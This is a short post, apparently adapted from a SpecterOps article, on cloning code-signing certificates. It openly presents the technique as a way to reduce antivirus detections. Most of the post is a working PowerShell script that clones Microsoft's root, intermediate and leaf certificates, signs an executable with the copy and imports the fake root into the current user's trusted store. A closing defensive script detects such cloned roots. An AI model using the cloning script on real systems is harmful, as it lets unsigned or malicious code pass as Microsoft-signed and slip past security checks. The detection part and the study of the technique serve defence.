
Cloning a Code Signing certificate or how to reduce antivirus detections in 60 seconds



Code signing is an important security mechanism that allows users to establish trust in the application they are about to run. For security purposes, developers must use code signing certificates to confirm that the application is legitimate and has not been modified by intruders.

How does a code signing certificate get cloned?

To understand how this attack works, you need to understand how the code signing process works. When signing code, the private key of a key pair is used to create a digital signature, which is then attached to the application together with the certificate that carries the public key. When the user runs the application, the operating system verifies the digital signature using the public key to ensure that the application has not been modified after it was signed.

Cloning a code signing certificate is done as follows. We export the certificate chain from someone else's signed application, create self-signed copies that carry the same names, and sign our own application with the copy. At least 50% of antivirus products don't check certificates for validity; they just check the name, so this reduces the number of detections on VirusTotal.

Exporting a certificate from someone else's application:

The script creates an example application (hello world), signs the file with the cloned certificate and adds the cloned root certificate to the certificate store "Cert:\CurrentUser\Root", the trusted root store of the current user in the Windows operating system. This store holds the trusted root certificates issued by certificate authorities.

Signature script:

# We'll just store the cloned certificates in current user "Personal" store for now.
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }

$MS_Root_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Root.cer
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation

$MS_PCA_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32PCA.cer
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation

$MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Leaf.cer
$Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation

# Create some sample code to practice signing on
Add-Type -TypeDefinition @'
public class Foo {
    public static void Main(string[] args) {
        System.Console.WriteLine("Hello, World!");
    }
}
'@ -OutputAssembly C:\Test\HelloWorld.exe

# Validate that HelloWorld.exe is not signed.
Get-AuthenticodeSignature -FilePath C:\Test\HelloWorld.exe

# Sign HelloWorld.exe with the cloned Microsoft leaf certificate.
Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath C:\Test\HelloWorld.exe
# The certificate will not properly validate because the root certificate is not trusted.

# View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError"
# "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider"
Get-AuthenticodeSignature -FilePath C:\Test\HelloWorld.exe | Format-List *

# Save the root certificate to disk and import it into the current user root store.
# Upon doing this, the HelloWorld.exe signature will validate properly.
Export-Certificate -Type CERT -FilePath C:\Test\MSKernel32Root_Cloned.cer -Cert $Cloned_MS_Root_Cert
Import-Certificate -FilePath C:\Test\MSKernel32Root_Cloned.cer -CertStoreLocation Cert:\CurrentUser\Root\

# You may need to start a new PowerShell process for the valid signature to take effect.
Get-AuthenticodeSignature -FilePath C:\Test\HelloWorld.exe


Source: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
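A defensive check for the last step of the script above, added here as an example that is not part of the original post or the SpecterOps article: a cloned certificate keeps the original's subject but has a new key pair and therefore a different thumbprint, so a root that exists only in the current user's store under a machine-trusted name stands out. The function name `Find-UserOnlyRootCert` and the sample subjects and thumbprints are constructed for illustration.

```powershell
# Added example (not from the original post). List root certificates trusted
# only for the current user and mark those that reuse a machine-trusted name.
function Find-UserOnlyRootCert {
    param(
        # Defaults read the live stores; pass objects with Subject and
        # Thumbprint properties to run the comparison on other data.
        [object[]] $UserRoots    = (Get-ChildItem -Path Cert:\CurrentUser\Root),
        [object[]] $MachineRoots = (Get-ChildItem -Path Cert:\LocalMachine\Root)
    )

    $machineThumbprints = @($MachineRoots | ForEach-Object { $_.Thumbprint })
    $machineSubjects    = @($MachineRoots | ForEach-Object { $_.Subject })

    foreach ($cert in $UserRoots) {
        # Entries that are also trusted machine-wide are not user additions.
        if ($machineThumbprints -contains $cert.Thumbprint) { continue }

        [pscustomobject]@{
            Subject    = $cert.Subject
            Thumbprint = $cert.Thumbprint
            # True: same name as a machine-trusted root, different thumbprint.
            # That is what a cloned root looks like once it is imported.
            ReusesMachineSubject = ($machineSubjects -contains $cert.Subject)
        }
    }
}

# Constructed sample data (names and thumbprints are placeholders).
$sampleMachine = @(
    [pscustomobject]@{ Subject = 'CN=Example Root CA'; Thumbprint = 'CONSTRUCTED-THUMBPRINT-0001' }
)
$sampleUser = @(
    [pscustomobject]@{ Subject = 'CN=Example Root CA'; Thumbprint = 'CONSTRUCTED-THUMBPRINT-0001' }
    [pscustomobject]@{ Subject = 'CN=Example Root CA'; Thumbprint = 'CONSTRUCTED-THUMBPRINT-0002' }
    [pscustomobject]@{ Subject = 'CN=Internal Lab Root'; Thumbprint = 'CONSTRUCTED-THUMBPRINT-0003' }
)

# Offline run on the sample data, then the same check on the live stores.
Find-UserOnlyRootCert -UserRoots $sampleUser -MachineRoots $sampleMachine | Format-Table -AutoSize
Find-UserOnlyRootCert | Format-Table -AutoSize
```

User-only roots can be legitimate, so the output is a review list; rows with `ReusesMachineSubject` set to True are the ones to examine first.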

